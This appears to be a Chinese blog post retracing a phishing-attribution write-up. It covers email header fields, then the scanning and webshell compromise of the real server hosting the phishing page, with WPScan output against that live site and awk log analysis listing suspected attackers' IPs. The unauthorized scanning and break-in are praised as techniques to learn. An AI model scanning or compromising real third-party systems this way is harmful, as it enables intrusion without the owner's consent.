

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">

  <link rel="apple-touch-icon" sizes="76x76" href="/img/icon/warning.png">
  <link rel="icon" href="/img/icon/warning.png">
  

  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="0X00 前言闲来无事翻翻网站 ，然后发现了这篇文章，看了一下内容可以说是相当震撼，几乎将所有的步骤全部还原，百年难遇的好文章，虽然很长，但还是不能放过这个学习的机会，于是赶紧写下读后的一些收获和感悟。 0X01根据钓鱼邮件内容进行信息挖掘原文从信头中挖掘到的信息如下： 钓鱼网站  www.rosturplast.com137.74.81.5 法国  钓鱼链接:  http:&#x2F;&#x2F;www.rostu">
<meta property="og:type" content="article">
<meta property="og:title" content="有关“邮件钓鱼攻击与溯源”一文的阅读回溯">
<meta property="og:url" content="http://example.com/2020/01/20/%E6%9C%89%E5%85%B3%E2%80%9C%E9%82%AE%E4%BB%B6%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB%E4%B8%8E%E6%BA%AF%E6%BA%90%E2%80%9D%E4%B8%80%E6%96%87%E7%9A%84%E9%98%85%E8%AF%BB%E5%9B%9E%E6%BA%AF/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="0X00 前言闲来无事翻翻网站 ，然后发现了这篇文章，看了一下内容可以说是相当震撼，几乎将所有的步骤全部还原，百年难遇的好文章，虽然很长，但还是不能放过这个学习的机会，于是赶紧写下读后的一些收获和感悟。 0X01根据钓鱼邮件内容进行信息挖掘原文从信头中挖掘到的信息如下： 钓鱼网站  www.rosturplast.com137.74.81.5 法国  钓鱼链接:  http:&#x2F;&#x2F;www.rostu">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B61.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B62.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B66.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B63.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B64.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B65.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B67.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B68.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B69.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B610.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B611.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B612.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B613.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B616.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B614.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B615.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B617.png">
<meta property="og:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B618.png">
<meta property="article:published_time" content="2020-01-20T02:32:18.000Z">
<meta property="article:modified_time" content="2025-01-24T18:30:42.423Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="渗透测试">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B61.png">
  
  
  
  <title>有关“邮件钓鱼攻击与溯源”一文的阅读回溯 - Hexo</title>

  <link  rel="stylesheet" href="https://lib.baomitu.com/twitter-bootstrap/4.6.1/css/bootstrap.min.css" />



  <link  rel="stylesheet" href="https://lib.baomitu.com/github-markdown-css/4.0.0/github-markdown.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/hint.css/2.7.0/hint.min.css" />

  <link  rel="stylesheet" href="https://lib.baomitu.com/fancybox/3.5.7/jquery.fancybox.min.css" />



<!-- 主题依赖的图标库，不要自行修改 -->
<!-- Do not modify the link that theme dependent icons -->

<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1749284_5i9bdhy70f8.css">



<link rel="stylesheet" href="//at.alicdn.com/t/c/font_1736178_k526ubmyhba.css">


<link  rel="stylesheet" href="/css/main.css" />


  <link id="highlight-css" rel="stylesheet" href="/css/highlight.css" />
  
    <link id="highlight-css-dark" rel="stylesheet" href="/css/highlight-dark.css" />
  



  
<link rel="stylesheet" href="/css/macpanel.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    Fluid.ctx = Object.assign({}, Fluid.ctx)
    var CONFIG = {"hostname":"example.com","root":"/","version":"1.9.8","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false,"scope":[]},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"left","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"code_language":{"enable":true,"default":"TEXT"},"copy_btn":true,"image_caption":{"enable":true},"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"placement":"right","headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"follow_dnt":true,"baidu":null,"google":{"measurement_id":null},"tencent":{"sid":null,"cid":null},"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false},"umami":{"src":null,"website_id":null,"domains":null,"start_time":"2024-01-01T00:00:00.000Z","token":null,"api_server":null}},"search_path":"/local-search.xml","include_content_in_search":true};

    if (CONFIG.web_analytics.follow_dnt) {
      var dntVal = navigator.doNotTrack || window.doNotTrack || navigator.msDoNotTrack;
      Fluid.ctx.dnt = dntVal && (dntVal.startsWith('1') || dntVal.startsWith('yes') || dntVal.startsWith('on'));
    }
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
  


  
<meta name="generator" content="Hexo 7.3.0"></head>


<body>
  

  <header>
    

<div class="header-inner" style="height: 70vh;">
  <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>K0rz3n&#39;s Blog</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/" target="_self">
                <i class="iconfont icon-home-fill"></i>
                <span>Home</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/" target="_self">
                <i class="iconfont icon-archive-fill"></i>
                <span>Archives</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/" target="_self">
                <i class="iconfont icon-category-fill"></i>
                <span>Categories</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/" target="_self">
                <i class="iconfont icon-tags-fill"></i>
                <span>Tags</span>
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/" target="_self">
                <i class="iconfont icon-user-fill"></i>
                <span>About</span>
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              <i class="iconfont icon-search"></i>
            </a>
          </li>
          
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">
              <i class="iconfont icon-dark" id="color-toggle-icon"></i>
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

  

<div id="banner" class="banner" parallax=true
     style="background: url('/img/banner/icemountain.jpg') no-repeat center center; background-size: cover;">
  <div class="full-bg-img">
    <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
      <div class="banner-text text-center fade-in-up">
        <div class="h2">
          
            <span id="subtitle" data-typed-text="有关“邮件钓鱼攻击与溯源”一文的阅读回溯"></span>
          
        </div>

        
          
  <div class="mt-3">
    
    
      <span class="post-meta">
        <i class="iconfont icon-date-fill" aria-hidden="true"></i>
        <time datetime="2020-01-20 02:32" pubdate>
          January 20, 2020 am
        </time>
      </span>
    
  </div>

  <div class="mt-1">
    
      <span class="post-meta mr-2">
        <i class="iconfont icon-chart"></i>
        
          7.8k words
        
      </span>
    

    
      <span class="post-meta mr-2">
        <i class="iconfont icon-clock-fill"></i>
        
        
        
          65 mins
        
      </span>
    

    
    
  </div>


        
      </div>

      
    </div>
  </div>
</div>

</div>

  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="side-col d-none d-lg-block col-lg-2">
      

    </div>

    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div id="board">
          <article class="post-content mx-auto">
            <h1 id="seo-header">有关“邮件钓鱼攻击与溯源”一文的阅读回溯</h1>
            
            
              <div class="markdown-body">
                
                <h2 id="0X00-前言"><a href="#0X00-前言" class="headerlink" title="0X00 前言"></a><strong>0X00 前言</strong></h2><p>闲来无事翻翻网站 ，然后发现了这篇文章，看了一下内容可以说是相当震撼，几乎将所有的步骤全部还原，百年难遇的好文章，虽然很长，但还是不能放过这个学习的机会，于是赶紧写下读后的一些收获和感悟。</p>
<h2 id="0X01根据钓鱼邮件内容进行信息挖掘"><a href="#0X01根据钓鱼邮件内容进行信息挖掘" class="headerlink" title="0X01根据钓鱼邮件内容进行信息挖掘"></a><strong>0X01根据钓鱼邮件内容进行信息挖掘</strong></h2><p><strong>原文从信头中挖掘到的信息如下：</strong></p>
<pre><code class="hljs">钓鱼网站 
www.rosturplast.com137.74.81.5 法国 
钓鱼链接: 
http://www.rosturplast.com/shells/logon.secureaccess/?ml=test@test.cn 
发件地址 
no-response@365.mirohaviar.sk 
服务商 
Platon Technologies, s.r.o 斯洛伐克 
SMTP 
sysmailout1.platon.sk 85.248.228.17 斯洛伐克
</code></pre>
<p>这里其实应该注意到的是我们对邮件的信息收集不能仅仅局限于邮件表面看到的东西，我们需要查看信头，如果觉得看起来不舒服，还可选择导出邮件，这时候就会生成一个 .eml 文件。</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B61.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p>这样我们就能看到一个邮件的全貌(邮件本身是由信头和邮件体组成的，我们一般看到的都是邮件体而忽略了邮件头部的重要信息，<strong>邮件头和邮件体是由一个空行分隔的</strong>)</p>
<h3 id="邮件头信息解释"><a href="#邮件头信息解释" class="headerlink" title="邮件头信息解释"></a><strong>邮件头信息解释</strong></h3><h4 id="1-Received"><a href="#1-Received" class="headerlink" title="(1)Received"></a><strong>(1)Received</strong></h4><p>路由信息，记录了邮件传递过程。</p>
<blockquote>
<p><strong>特点：</strong></p>
<p>整个邮件原文中，只有Received段是不由发件方编辑的，是由接收方加载的<br>由所经过的路由在信头<strong>最顶部</strong>添加<br>每经过一个处理，必须在最上层添加一个Received,且不得改变其他Received的顺序<br>这里面的 from ，by 分别表示接受和发送的邮件服务器，for 是最终的收件人地址</p>
</blockquote>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B62.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<h4 id="2-Data：-表示邮件建立的时间，既不是发送时间也不是接收时间，是邮件发送方创建邮件的时间。"><a href="#2-Data：-表示邮件建立的时间，既不是发送时间也不是接收时间，是邮件发送方创建邮件的时间。" class="headerlink" title="**(2)Data：**表示邮件建立的时间，既不是发送时间也不是接收时间，是邮件发送方创建邮件的时间。"></a>**(2)Data：**表示邮件建立的时间，既不是发送时间也不是接收时间，是邮件发送方创建邮件的时间。</h4><h4 id="3-From：表示一个或多个邮件的作者，显示在正文的发件人。由发件方编辑，例如发垃圾的就会将此字段编辑成不存在的地址；发诈骗邮件的就会将此字段编辑成被冒充的邮件地址。"><a href="#3-From：表示一个或多个邮件的作者，显示在正文的发件人。由发件方编辑，例如发垃圾的就会将此字段编辑成不存在的地址；发诈骗邮件的就会将此字段编辑成被冒充的邮件地址。" class="headerlink" title="(3)From：表示一个或多个邮件的作者，显示在正文的发件人。由发件方编辑，例如发垃圾的就会将此字段编辑成不存在的地址；发诈骗邮件的就会将此字段编辑成被冒充的邮件地址。"></a><strong>(3)From：<strong>表示一个或多个</strong>邮件的作者，显示在正文的发件人</strong>。由发件方编辑，例如发垃圾的就会将此字段编辑成不存在的地址；发诈骗邮件的就会将此字段编辑成被冒充的邮件地址。</h4><h4 id="4-To：-表示邮件的接收地址。"><a href="#4-To：-表示邮件的接收地址。" class="headerlink" title="**(4)To：**表示邮件的接收地址。"></a>**(4)To：**表示邮件的接收地址。</h4><h4 id="5-CC：-表示抄送的邮件地址。"><a href="#5-CC：-表示抄送的邮件地址。" class="headerlink" title="**(5)CC：**表示抄送的邮件地址。"></a>**(5)CC：**表示抄送的邮件地址。</h4><h4 id="6-BCC：-表示密送的邮件地址。"><a href="#6-BCC：-表示密送的邮件地址。" class="headerlink" title="**(6)BCC：**表示密送的邮件地址。"></a>**(6)BCC：**表示密送的邮件地址。</h4><h4 id="7-Subject：-表示邮件的主题。"><a href="#7-Subject：-表示邮件的主题。" class="headerlink" title="**(7)Subject：**表示邮件的主题。"></a>**(7)Subject：**表示邮件的主题。</h4><h4 id="8-Sender：-表示邮件的实际投递者（只能是一个），一般由收件方添加，邮件服务商在收到邮件后会将邮件会话里面的实际投递者与信头From字段标识的发件这进行比较，如不一致则在信头下方加入Sender字段标识邮件实际投递者，但这个字段也可由发件方决定的-from-和-sender-不一致的情况下部分邮件服务商会有代发标识-。"><a href="#8-Sender：-表示邮件的实际投递者（只能是一个），一般由收件方添加，邮件服务商在收到邮件后会将邮件会话里面的实际投递者与信头From字段标识的发件这进行比较，如不一致则在信头下方加入Sender字段标识邮件实际投递者，但这个字段也可由发件方决定的-from-和-sender-不一致的情况下部分邮件服务商会有代发标识-。" class="headerlink" title="**(8)Sender：**表示邮件的实际投递者（只能是一个），一般由收件方添加，邮件服务商在收到邮件后会将邮件会话里面的实际投递者与信头From字段标识的发件这进行比较，如不一致则在信头下方加入Sender字段标识邮件实际投递者，但这个字段也可由发件方决定的(from 和 sender 不一致的情况下部分邮件服务商会有代发标识)。"></a>**(8)Sender：**表示邮件的实际投递者（只能是一个），一般由收件方添加，邮件服务商在收到邮件后会将邮件会话里面的实际投递者与信头From字段标识的发件这进行比较，如不一致则在信头下方加入Sender字段标识邮件实际投递者，但这个字段也可由发件方决定的(from 和 sender 不一致的情况下部分邮件服务商会有代发标识)。</h4><h4 id="9-Reply-to：-表示回复地址，由发件方编辑，希望收件人回复邮件时回复到指定的地址。一般情况下，如不额外添加Reply-to字段，收件人回复邮件时，将回复到原邮件From字段标识的地址。"><a href="#9-Reply-to：-表示回复地址，由发件方编辑，希望收件人回复邮件时回复到指定的地址。一般情况下，如不额外添加Reply-to字段，收件人回复邮件时，将回复到原邮件From字段标识的地址。" class="headerlink" title="**(9)Reply-to：**表示回复地址，由发件方编辑，希望收件人回复邮件时回复到指定的地址。一般情况下，如不额外添加Reply-to字段，收件人回复邮件时，将回复到原邮件From字段标识的地址。"></a>**(9)Reply-to：**表示回复地址，由发件方编辑，希望收件人回复邮件时回复到指定的地址。一般情况下，如不额外添加Reply-to字段，收件人回复邮件时，将回复到原邮件From字段标识的地址。</h4><h4 id="10-MIME-Version：-表示MIME的版本。"><a href="#10-MIME-Version：-表示MIME的版本。" class="headerlink" title="**(10)MIME-Version：**表示MIME的版本。"></a>**(10)MIME-Version：**表示MIME的版本。</h4><h4 id="11-Content-Type：-标识了邮件内容的格式。"><a href="#11-Content-Type：-标识了邮件内容的格式。" class="headerlink" title="**(11)Content-Type：**标识了邮件内容的格式。"></a>**(11)Content-Type：**标识了邮件内容的格式。</h4><h4 id="12-Return-path：-标识指定的退信地址，一般情况下，不添加Return-path字段，退信默认退到Sender标识的地址。当Sender和From一致时，退信默认退到From标识的地址。"><a href="#12-Return-path：-标识指定的退信地址，一般情况下，不添加Return-path字段，退信默认退到Sender标识的地址。当Sender和From一致时，退信默认退到From标识的地址。" class="headerlink" title="**(12)Return-path：**标识指定的退信地址，一般情况下，不添加Return-path字段，退信默认退到Sender标识的地址。当Sender和From一致时，退信默认退到From标识的地址。"></a>**(12)Return-path：**标识指定的退信地址，一般情况下，不添加Return-path字段，退信默认退到Sender标识的地址。当Sender和From一致时，退信默认退到From标识的地址。</h4><h2 id="0X02-找到用来钓鱼的网站进行漏洞挖掘"><a href="#0X02-找到用来钓鱼的网站进行漏洞挖掘" class="headerlink" title="0X02 找到用来钓鱼的网站进行漏洞挖掘"></a><strong>0X02 找到用来钓鱼的网站进行漏洞挖掘</strong></h2><h3 id="1-利用漏洞得到-shell"><a href="#1-利用漏洞得到-shell" class="headerlink" title="(1)利用漏洞得到 shell"></a><strong>(1)利用漏洞得到 shell</strong></h3><p>根据钓鱼链接找到攻击者用来放置钓鱼页面的网站，试图寻找攻击者利用的漏洞，这一步也需要大量的信息收集，原文作者收集到的信息如下：</p>
<pre><code class="hljs">[+] PORT: 使用 nmap -sS ip 进行扫描
[+] HOST: www.rosturplast.com 137.74.81.5 法国 
[+] OS: Red Hat 4.8 
[+] Web Server: Apache/2.4.6 OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 
[+] CMS: Joomla 3.3.3 Joomla!是一套海外流行的建站系统基于PHP+MySQL开发
</code></pre>
<p>我对此也进行了相关的检测，但是发现可能由于管理员发现被入侵的原因，原网站已经不再是使用 joomla 而是使用了 wordpress(当然也是一个低版本的 wordpress4.4.3，真不知道管理是怎么想的….)</p>
<pre><code class="hljs">[+]Web Server: nginx/1.14.1,PHP 5.4.45,MySQL5.5.5-10.0.37-MariaDB
[+]CMS: wordpress4.9.9
</code></pre>
<p><strong>我选择尝试使用 WPScan 对其进行一些测试，看看最新的 wp 是不是依然会有攻击的可能</strong></p>
<pre><code class="hljs">[+] WordPress theme in use: astra
 | Location: http://rosturplast.com/wp-content/themes/astra/
 | Last Updated: 2019-01-29T00:00:00.000Z
 | Readme: http://rosturplast.com/wp-content/themes/astra/readme.txt
 | Changelog: http://rosturplast.com/wp-content/themes/astra/changelog.txt
 | [!] The version is out of date, the latest version is 1.6.8
 | Style URL: http://rosturplast.com/wp-content/themes/astra/style.css
 | Style Name: Astra
 | Style URI: https://wpastra.com/
 | Description: Astra is fast, fully customizable &amp; beautiful theme suitable for blog, personal portfolio, business ...
 | Author: Brainstorm Force
 | Author URI: https://wpastra.com/about/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.5.5 (80% confidence)
 | Detected By: Style (Passive Detection)
 |  - http://rosturplast.com/wp-content/themes/astra/style.css, Match: &#39;Version: 1.5.5&#39;

[+] Enumerating All Plugins (via Passive Methods)
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] Plugin(s) Identified:

[+] astra-addon
 | Location: http://rosturplast.com/wp-content/plugins/astra-addon/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] contact-form-7
 | Location: http://rosturplast.com/wp-content/plugins/contact-form-7/
 | Last Updated: 2018-12-18T18:05:00.000Z
 | [!] The version is out of date, the latest version is 5.1.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 5.0.5 (100% confidence)
 | Detected By: Query Parameter (Passive Detection)
 |  - http://rosturplast.com/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.0.5
 |  - http://rosturplast.com/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.0.5
 | Confirmed By:
 |  Readme - Stable Tag (Aggressive Detection)
 |   - http://rosturplast.com/wp-content/plugins/contact-form-7/readme.txt
 |  Readme - ChangeLog Section (Aggressive Detection)
 |   - http://rosturplast.com/wp-content/plugins/contact-form-7/readme.txt

[+] elementor
 | Location: http://rosturplast.com/wp-content/plugins/elementor/
 | Last Updated: 2019-02-11T14:45:00.000Z
 | [!] The version is out of date, the latest version is 2.4.6
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.3.4 (100% confidence)
 | Detected By: Query Parameter (Passive Detection)
 |  - http://rosturplast.com/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=2.3.4
 |  - http://rosturplast.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=2.3.4
 | Confirmed By: Readme - Stable Tag (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/elementor/readme.txt

[+] elementor-pro
 | Location: http://rosturplast.com/wp-content/plugins/elementor-pro/
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | The version could not be determined.

[+] essential-addons-for-elementor-lite
 | Location: http://rosturplast.com/wp-content/plugins/essential-addons-for-elementor-lite/
 | Last Updated: 2019-02-07T08:59:00.000Z
 | [!] The version is out of date, the latest version is 2.9.5
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 2.8.4 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/essential-addons-for-elementor-lite/readme.txt

[+] header-footer-elementor
 | Location: http://rosturplast.com/wp-content/plugins/header-footer-elementor/
 | Last Updated: 2019-02-15T12:35:00.000Z
 | [!] The version is out of date, the latest version is 1.1.2
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.0.16 (100% confidence)
 | Detected By: Readme - Stable Tag (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/header-footer-elementor/readme.txt
 | Confirmed By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/header-footer-elementor/readme.txt

[+] woocommerce
 | Location: http://rosturplast.com/wp-content/plugins/woocommerce/
 | Last Updated: 2019-01-21T18:32:00.000Z
 | [!] The version is out of date, the latest version is 3.5.4
 |
 | Detected By: Urls In Homepage (Passive Detection)
 | Confirmed By: Meta Generator (Passive Detection)
 |
 | Version: 3.5.2 (100% confidence)
 | Detected By: Query Parameter (Passive Detection)
 |  - http://rosturplast.com/wp-content/plugins/woocommerce/assets/js/frontend/add-to-cart.min.js?ver=3.5.2
 |  - http://rosturplast.com/wp-content/plugins/woocommerce/assets/js/frontend/woocommerce.min.js?ver=3.5.2
 |  - http://rosturplast.com/wp-content/plugins/woocommerce/assets/js/frontend/cart-fragments.min.js?ver=3.5.2
 | Confirmed By:
 |  Meta Generator (Passive Detection)
 |   - http://rosturplast.com/, Match: &#39;WooCommerce 3.5.2&#39;
 |  Translation File (Aggressive Detection)
 |   - http://rosturplast.com/wp-content/plugins/woocommerce/i18n/languages/woocommerce.pot, Match: &#39;&quot;Project-Id-Version: WooCommerce 3.5.2&#39;

[+] wpforms-lite
 | Location: http://rosturplast.com/wp-content/plugins/wpforms-lite/
 | Last Updated: 2019-02-06T17:39:00.000Z
 | [!] The version is out of date, the latest version is 1.5.1
 |
 | Detected By: Urls In Homepage (Passive Detection)
 |
 | Version: 1.4.9 (100% confidence)
 | Detected By: Readme - ChangeLog Section (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/wpforms-lite/readme.txt
 | Confirmed By: Translation File (Aggressive Detection)
 |  - http://rosturplast.com/wp-content/plugins/wpforms-lite/languages/wpforms.pot, Match: &#39;&quot;Project-Id-Version: WPForms 1.4.9&#39;
</code></pre>
<p>可以发现这个网站虽然 wp 是最新版本，但是插件的版本都比较旧，还是存在攻击的可能</p>
<p>并且我在目录扫描的时候还发现了phpmyadmin 后台</p>
<p><img src="https://picture-1253331270.cos.ap-beijing.myqcloud.com/%E9%92%93%E9%B1%BC%E9%82%AE%E4%BB%B66.png" srcset="/img/loading.gif" lazyload alt="此处输入图片的描述"></p>
<p><strong>当然，原作者在joomscan 测试无果的情况下考虑目录扫描和爆破备份文件的方法是值得我们去学习的，并且确实通过这种方式找到了备份文件并进入了phpmyadmin后台，由于不能写 shell,转而进入了 joomla 后台</strong></p>
<p>进入 joomla 后台后思路还是要利用后台的功能写 shell ，原作者这里使用的是写模板文件的方法。</p>
<h3 id="2-查看日志及shell获取攻击者ip信息"><a href="#2-查看日志及shell获取攻击者ip信息" class="headerlink" title="(2)查看日志及shell获取攻击者ip信息"></a><strong>(2)查看日志及shell获取攻击者ip信息</strong></h3><p>拿到 shell 以后首先的思路就是将攻击者的信息拿到，那么哪里有这些信息呢？一般在日志、shell和获取的钓鱼信息文件(<strong>这个文件是攻击者需要访问的，因为我们的目的就是溯源，故我们需要知道谁一直在访问这个文件获取信息，那么这个人大概率就是攻击者</strong>)里面有，于是将整个网站和日志打包以后放在 web 目录 使用 wget 下载到本地</p>
<p><strong>原作者使用 D 盾进行整站的 shell 检测，这样就不会遗漏，还是值得学习的</strong></p>
<p>确认了攻击者使用的 shell 以后就能通过日志查看哪些 ip 对其有所访问，这里使用命令 awk (作者对awk 的使用可以说是非常娴熟，自己还要多多磨炼)</p>
<pre><code class="hljs">root@kali /tmp/rosturplast.com/log grep &quot;/shells/&quot; * |grep &quot;php&quot; | awk -F &quot;:&quot; &#39;&#123;print $2&#125;&#39; |awk &#39;&#123;a[$1]+=1;&#125; END &#123;for(i in a)&#123;print a[i]&quot; &quot;i;&#125;&#125;&#39; |sort -t &quot; &quot; -k 1 -n -r &gt;ip.txt
26 174.85.145.99
20 50.73.252.169
10 213.233.104.120
2 207.228.149.69
2 195.211.23.207
2 129.205.113.8
</code></pre>
<p>然后又利用了一个 ip 地址查询接口获取了 ip 对应的国家</p>
<pre><code class="hljs">root@kali /tmp/rosturplast.com/log for line in $(&lt;ip.txt); do curl https://ip.cn/\?ip\=$line ; done
IP: 174.85.145.99 来自: 美国
IP: 50.73.252.169 来自: 美国
IP: 213.233.104.120 来自: 罗马尼亚
IP: 207.228.149.69 来自: 百慕大
IP: 195.211.23.207 来自: 俄罗斯
IP: 129.205.113.8 来自: 尼日利亚
</code></pre>
<p>根据后门文件名匹配Apache访问日志得到攻击者的代理IP和User Agent</p>
<pre><code class="hljs">root@kali /tmp grep &quot;/shells&quot; *| grep &quot;php&quot; |grep &quot;POST&quot; |awk -F &quot;:&quot; &#39;&#123;print $2 $6&#125;&#39; |sort |uniq
129.205.113.8 - - [30/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36&quot;
174.85.145.99 - - [27/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
207.228.149.69 - - [28/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
213.233.104.120 - - [27/Nov/2018//www.rosturplast.com/shells//bacu.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv
50.73.252.169 - - [29/Nov/2018//www.rosturplast.com/shells/config.php&quot; &quot;Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36&quot;
</code></pre>
